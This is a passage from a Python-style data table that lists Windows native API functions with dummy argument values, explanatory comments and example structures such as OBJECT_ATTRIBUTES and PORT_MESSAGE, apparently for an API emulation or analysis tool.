"fieldValue": "0x00000000", "fieldComment": "No attributes" }, { "fieldName": "ValidAttributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No valid attributes" } ] }, "struct118": { "type": "ALPC_MESSAGE_ATTRIBUTES", "fields": [ { "fieldName": "AllocatedAttributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No attributes" }, { "fieldName": "ValidAttributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No valid attributes" } ] }, "struct119": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.Length", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Message length" }, { "fieldName": "u1.ZeroInit", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero initialized" }, { "fieldName": "u2.Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type" }, { "fieldName": "u2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "No data info" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99994444", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Message ID" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "No client view" } ] }, "struct120": { "type": "SID", "fields": [ { "fieldName": "Revision", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "SID revision" }, { "fieldName": "SubAuthorityCount", "fieldType": "BYTE", "fieldValue": "0x01", "fieldComment": "One subauthority" }, { "fieldName": "IdentifierAuthority", "fieldType": "BYTE[6]", "fieldValue": "0x000000000005", "fieldComment": "NT Authority" }, { "fieldName": "SubAuthority[0]", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "Example subauthority" } ] }, "struct121": { "type": "ALPC_PORT_ATTRIBUTES", "fields": [ { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "ALPC_PORTFLG_ALLOW_LPC_REQUESTS" }, { "fieldName": "SecurityQos.Length", "fieldType": "ULONG", "fieldValue": "0x0000000C", "fieldComment": "SECURITY_QUALITY_OF_SERVICE size" }, { "fieldName": "MaxMessageLength", "fieldType": "ULONG", "fieldValue": "0x00001000", "fieldComment": "4KB max message" }, { "fieldName": "MemoryBandwidth", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxPoolUsage", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxViewSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" }, { "fieldName": "MaxTotalSectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Default" } ] }, "struct122": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0110", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] }, "struct123": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0022", "fieldComment": "Buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0120", "fieldComment": "Pointer to string buffer (dummy pointer)" } ] } } }, "NtCancelDeviceWakeupRequest": { "ntFunc": "NtCancelDeviceWakeupRequest", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE Device (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateChannel": { "ntFunc": "NtCreateChannel", "pushes": [ { "value": "0xbadd00f0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct124", "structureValueExpectations": "Object attributes for the channel, commonly None.", "pointedValue": None }, { "value": "0xbadd0100", "additionalComment": "Pointer to HANDLE ChannelHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct124": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No attributes" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtFreeUserPhysicalPages": { "ntFunc": "NtFreeUserPhysicalPages", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG UserPfnArray (dummy pointer, array of page frame numbers)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00123456" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG NumberOfPages (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetPlugPlayEvent": { "ntFunc": "NtGetPlugPlayEvent", "pushes": [ { "value": "0x00001000", "additionalComment": "EventBufferLength (4096 bytes typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to PLUGPLAY_EVENT_BLOCK PnPEvent (dummy pointer)", "structurePointer": "PLUGPLAY_EVENT_BLOCK", "structureRef": "struct125", "structureValueExpectations": "Event GUID, event category, and event-specific data.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PnPContext (None, typical for no context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PnPApcRoutine (None, no APC routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct125": { "type": "PLUGPLAY_EVENT_BLOCK", "fields": [ { "fieldName": "EventGuid", "fieldType": "GUID", "fieldValue": "0xdeadbeef-0000-0000-0000-000000000001", "fieldComment": "Sample event GUID" }, { "fieldName": "EventCategory", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Hardware profile change event" }, { "fieldName": "Result", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No result" }, { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Flag set" }, { "fieldName": "TotalSize", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "64 bytes" }, { "fieldName": "DeviceObject", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenChannel": { "ntFunc": "NtOpenChannel", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct126", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to HANDLE ChannelHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct126": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtReplyWaitSendChannel": { "ntFunc": "NtReplyWaitSendChannel", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to CHANNEL_MESSAGE (dummy pointer)", "structurePointer": "CHANNEL_MESSAGE", "structureRef": "struct127", "structureValueExpectations": "Message header and data fields.", "pointedValue": None }, { "value": "0x00000040", "additionalComment": "Length (64 bytes, typical message size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to message text buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x41414141" } ], "structures": { "struct127": { "type": "CHANNEL_MESSAGE", "fields": [ { "fieldName": "MessageType", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Request message" }, { "fieldName": "DataLength", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "32 bytes" }, { "fieldName": "Data", "fieldType": "BYTE[32]", "fieldValue": "0x41424344", "fieldComment": "Sample data" } ] } } }, "NtSendWaitReplyChannel": { "ntFunc": "NtSendWaitReplyChannel", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to CHANNEL_MESSAGE (dummy pointer)", "structurePointer": "CHANNEL_MESSAGE", "structureRef": "struct128", "structureValueExpectations": "Message header and data fields.", "pointedValue": None }, { "value": "0x00000040", "additionalComment": "Length (64 bytes, typical message size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to message text buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x42424242" }, { "value": "0x00000555", "additionalComment": "HANDLE ChannelHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct128": { "type": "CHANNEL_MESSAGE", "fields": [ { "fieldName": "MessageType", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Reply message" }, { "fieldName": "DataLength", "fieldType": "ULONG", "fieldValue": "0x00000020", "fieldComment": "32 bytes" }, { "fieldName": "Data", "fieldType": "BYTE[32]", "fieldValue": "0x44434241", "fieldComment": "Sample data" } ] } } }, "NtSetContextChannel": { "ntFunc": "NtSetContextChannel", "pushes": [ { "value": "0x00000000", "additionalComment": "None Context pointer (no context provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRequestDeviceWakeup": { "ntFunc": "NtRequestDeviceWakeup", "pushes": [ { "value": "0x00000000", "additionalComment": "None Device handle (no device specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRequestWakeupLatency": { "ntFunc": "NtRequestWakeupLatency", "pushes": [ { "value": "0x000003E8", "additionalComment": "LATENCY_TIME latency (1000 ms, typical value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtW32Call": { "ntFunc": "NtW32Call", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG OutputLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0xbadd0010", "additionalComment": "Pointer to output buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000008", "additionalComment": "InputLength (8 bytes, typical small input)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to input buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "ApiNumber (example: 1, typical for a known API call)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "KiUserApcDispatcher": { "ntFunc": "KiUserApcDispatcher", "pushes": [ { "value": "0x00000000", "additionalComment": "None ContextBody pointer (no context provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None ContextStart pointer (no context provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None Unused3 pointer (reserved, unused)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None Unused2 pointer (reserved, unused)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None Unused1 pointer (reserved, unused)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlertThread": { "ntFunc": "NtAlertThread", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE ThreadHandle (None, current thread)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCallbackReturn": { "ntFunc": "NtCallbackReturn", "pushes": [ { "value": "0x00000000", "additionalComment": "NTSTATUS Status (STATUS_SUCCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG ResultLength (0, no result)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Result (None, no result buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueueApcThread": { "ntFunc": "NtQueueApcThread", "pushes": [ { "value": "0x00000000", "additionalComment": "ULONG ApcReserved (reserved, must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_STATUS_BLOCK ApcStatusBlock (None, not used)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ApcRoutineContext (None, no context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None, no routine)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE ThreadHandle (None, current thread)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtTestAlert": { "ntFunc": "NtTestAlert", "pushes": [], "structures": {} }, "NtAddAtom": { "ntFunc": "NtAddAtom", "pushes": [ { "value": "0x00000000", "additionalComment": "PRTL_ATOM Atom (None, output parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PWCHAR AtomName (None, no atom name)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtDeleteAtom": { "ntFunc": "NtDeleteAtom", "pushes": [ { "value": "0x00004242", "additionalComment": "RTL_ATOM Atom (example atom value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFindAtom": { "ntFunc": "NtFindAtom", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to RTL_ATOM Atom (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0010", "additionalComment": "Pointer to WCHAR AtomName (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0020" } ], "structures": {} }, "NtQueryInformationAtom": { "ntFunc": "NtQueryInformationAtom", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000020", "additionalComment": "ULONG AtomInformationLength (example length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to AtomInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0050" }, { "value": "0x00000002", "additionalComment": "ATOM_INFORMATION_CLASS AtomInformationClass (e.g., AtomBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00004242", "additionalComment": "RTL_ATOM Atom (example atom value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlCompressBuffer": { "ntFunc": "RtlCompressBuffer", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to WorkspaceBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0070" }, { "value": "0xbadd0080", "additionalComment": "Pointer to ULONG pDestinationSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00000000", "additionalComment": "ULONG Unknown (reserved, typically 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00002000", "additionalComment": "ULONG DestinationBufferLength (example: 8 KB)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to DestinationBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd00a0" }, { "value": "0x00001000", "additionalComment": "ULONG SourceBufferLength (example: 4 KB)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to SourceBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd00c0" }, { "value": "0x00000201", "additionalComment": "ULONG CompressionFormat (COMPRESSION_FORMAT_LZNT1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlDecompressBuffer": { "ntFunc": "RtlDecompressBuffer", "pushes": [ { "value": "0xbadd00d0", "additionalComment": "Pointer to ULONG pDestinationSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00002000" }, { "value": "0x00001000", "additionalComment": "ULONG SourceBufferLength (example: 4 KB)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to SourceBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd00f0" }, { "value": "0x00002000", "additionalComment": "ULONG DestinationBufferLength (example: 8 KB)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0100", "additionalComment": "Pointer to DestinationBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0110" }, { "value": "0x00000201", "additionalComment": "ULONG CompressionFormat (COMPRESSION_FORMAT_LZNT1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlGetCompressionWorkSpaceSize": { "ntFunc": "RtlGetCompressionWorkSpaceSize", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG pUnknown (dummy pointer, typically unused or reserved)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG pNeededBufferSize (dummy pointer, receives required workspace size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00004000" }, { "value": "0x00000200", "additionalComment": "CompressionFormat (COMPRESSION_FORMAT_LZNT1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "DbgPrint": { "ntFunc": "DbgPrint", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to LPCSTR Format string (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd1000" } ], "structures": {} }, "NtSystemDebugControl": { "ntFunc": "NtSystemDebugControl", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, receives output length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00001000", "additionalComment": "ULONG OutputBufferLength (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to OutputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd2000" }, { "value": "0x00000020", "additionalComment": "ULONG InputBufferLength (32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to InputBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd3000" }, { "value": "0x0000000B", "additionalComment": "SYSDBG_COMMAND Command (e.g., SysDbgReadVirtual)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlCaptureStackBackTrace": { "ntFunc": "RtlCaptureStackBackTrace", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG BackTraceHash (dummy pointer, receives hash value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x12345678" }, { "value": "0xbadd0070", "additionalComment": "Pointer to BackTrace array (dummy pointer, receives stack addresses)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd4000" }, { "value": "0x00000010", "additionalComment": "ULONG FramesToCapture (16 frames)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG FramesToSkip (skip 2 frames)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlGetCallersAddress": { "ntFunc": "RtlGetCallersAddress", "pushes": [ { "value": "0xbadd0080", "additionalComment": "Pointer to PVOID CallersCaller (dummy pointer, receives caller's caller address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x7ffdf000" }, { "value": "0xbadd0090", "additionalComment": "Pointer to PVOID CallersAddress (dummy pointer, receives caller's address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x7ffde000" } ], "structures": {} }, "NtDisplayString": { "ntFunc": "NtDisplayString", "pushes": [ { "value": "0x00000000", "additionalComment": "None PUNICODE_STRING String (no string displayed)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRaiseException": { "ntFunc": "NtRaiseException", "pushes": [ { "value": "0x00000000", "additionalComment": "HandleException = FALSE (do not handle in-process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PCONTEXT ThreadContext (no context provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PEXCEPTION_RECORD ExceptionRecord (no exception record provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRaiseHardError": { "ntFunc": "NtRaiseHardError", "pushes": [ { "value": "0x00000000", "additionalComment": "None PHARDERROR_RESPONSE Response (no response pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HARDERROR_RESPONSE_OPTION = 0 (default option)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PVOID Parameters (no parameters)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PUNICODE_STRING UnicodeStringParameterMask (no mask)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "NumberOfParameters = 0 (no parameters)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "NTSTATUS ErrorStatus = STATUS_SUCCESS (no error)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetDefaultHardErrorPort": { "ntFunc": "NtSetDefaultHardErrorPort", "pushes": [ { "value": "0x00000000", "additionalComment": "None HANDLE PortHandle (no port set)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQuerySystemEnvironmentValue": { "ntFunc": "NtQuerySystemEnvironmentValue", "pushes": [ { "value": "0x00000000", "additionalComment": "None PULONG RequiredLength (not requesting required length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ValueBufferLength = 0 (no buffer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PWCHAR Value (no value buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PUNICODE_STRING VariableName (no variable name specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetSystemEnvironmentValue": { "ntFunc": "NtSetSystemEnvironmentValue", "pushes": [ { "value": "0x00000000", "additionalComment": "PUNICODE_STRING Value (None, typical for unset or default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PUNICODE_STRING VariableName (None, typical for unset or default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlCreateEnvironment": { "ntFunc": "RtlCreateEnvironment", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID Environment (None, receives pointer to new environment block)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN Inherit (FALSE, do not inherit parent environment)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlDestroyEnvironment": { "ntFunc": "RtlDestroyEnvironment", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID Environment (None, typical for default or uninitialized)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlExpandEnvironmentStrings_U": { "ntFunc": "RtlExpandEnvironmentStrings_U", "pushes": [ { "value": "0x00000000", "additionalComment": "PULONG DestinationBufferLength (None, typical for default or uninitialized)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PUNICODE_STRING DestinationString (None, typical for default or uninitialized)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PUNICODE_STRING SourceString (None, typical for default or uninitialized)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Environment (None, use current process environment)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlQueryEnvironmentVariable_U": { "ntFunc": "RtlQueryEnvironmentVariable_U", "pushes": [ { "value": "0x00000000", "additionalComment": "PUNICODE_STRING VariableValue (None, typical for default or uninitialized)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PUNICODE_STRING VariableName (None, typical for default or uninitialized)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Environment (None, use current process environment)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlSetCurrentEnvironment": { "ntFunc": "RtlSetCurrentEnvironment", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to PVOID OldEnvironment (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0010", "additionalComment": "Pointer to PVOID NewEnvironment (dummy 